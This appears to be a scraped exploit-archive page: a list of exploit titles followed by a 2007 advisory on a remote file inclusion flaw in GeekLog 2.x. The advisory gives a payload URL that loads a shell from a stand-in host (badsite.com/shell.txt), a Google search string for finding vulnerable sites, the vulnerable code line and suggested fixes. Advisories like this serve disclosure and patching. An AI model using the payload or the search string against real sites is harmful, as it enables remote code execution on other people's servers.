477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
77 lines
3.4 KiB
Text
Executable file
77 lines
3.4 KiB
Text
Executable file
--------------------------------[ 05/18/2007 ]---------------------------------
|
|
|
|
GeekLog 2.* (ImageImageMagick.php) RFI Vuln
|
|
|
|
-----------------------------------[ ASCII ]-----------------------------------
|
|
|
|
## ### # ###
|
|
## # ### / /###
|
|
## ### ## / / ###
|
|
## # ## / ## ### ##
|
|
## ## / ## #### ##
|
|
### ## ### /## /### ## ## ## ## ## ### ####
|
|
######### ### / ### / #### / ## ## ## ## ## ### ### /
|
|
## #### ## / ### ## ###/ ## ## ## ## ## ### ###/
|
|
## ## ## ## ### #### ## ## ## ## ## ## ##
|
|
## ## ## ######## ### ## ## ## ## ## ## ##
|
|
## ## ## ####### ### ## ## ## ## ## ## ##
|
|
## ## ## ## ### ## ## # / ## ## ##
|
|
## /# ## #### / /### ## ## ### / ## /# /
|
|
####/ ### / ######/ / #### / ### / ######/ ######/ ######/
|
|
### ##/ ##### ###/ ##/ ### ##### #####
|
|
-dsd863 [at] yahoo.com-
|
|
---------------------------------[ Contacts ]---------------------------------
|
|
|
|
diesl0w @ UnderNET
|
|
#hackphreak #oldskewl #ubergeeks #linux.edu #linuxhq
|
|
|
|
----------------------------------[ Credit ]----------------------------------
|
|
|
|
rgod <rgod [at] autistici.org> for his original BaseView.php RFI find
|
|
|
|
---------------------------------[ Download ]---------------------------------
|
|
|
|
http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz
|
|
|
|
---------------------------------[ Vuln Code ]--------------------------------
|
|
|
|
[geeklog path]/system/ImageImageMagick.php?glConf[path_system]=http://www.badsite.com/shell.txt?
|
|
|
|
|
|
-----------------------------------[ Issue ]----------------------------------
|
|
|
|
-Line 3 of ImageImageMagick.php-
|
|
|
|
require $glConf['path_system'] . 'BaseImage.php';
|
|
|
|
-----------------------------------[ Google ]----------------------------------
|
|
|
|
"Powered By Geeklog"
|
|
|
|
----------------------------------[ Solution ]---------------------------------
|
|
Change php.ini and set allow_url_fopen to Off
|
|
(Not tested but disabling URL-Access will fix the issue)
|
|
|
|
or
|
|
|
|
Insert the following code before line 3:
|
|
|
|
Add the following code:
|
|
|
|
if (strpos ($_SERVER['PHP_SELF'], 'ImageImageMagick.php') !== false){ die('Cant access file by itself.'); }
|
|
|
|
----------------------------[ Word from my sponsor ]---------------------------
|
|
|
|
Non-Christians: We were born sinners in need of a fix. Without Jesus as a we are going to hell. point blank
|
|
Christians: Keep passing the faith. Crucify yourself daily. When you fall, get back up.
|
|
|
|
Romans 3:23
|
|
"for all have sinned and fall short of the glory of God"
|
|
|
|
Romans 6:23
|
|
"For the wages of sin is death, but the gift of God is eternal life through Jesus Christ our Lord."
|
|
|
|
Romans 10:9
|
|
"That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved."
|
|
|
|
# milw0rm.com [2007-05-17]
|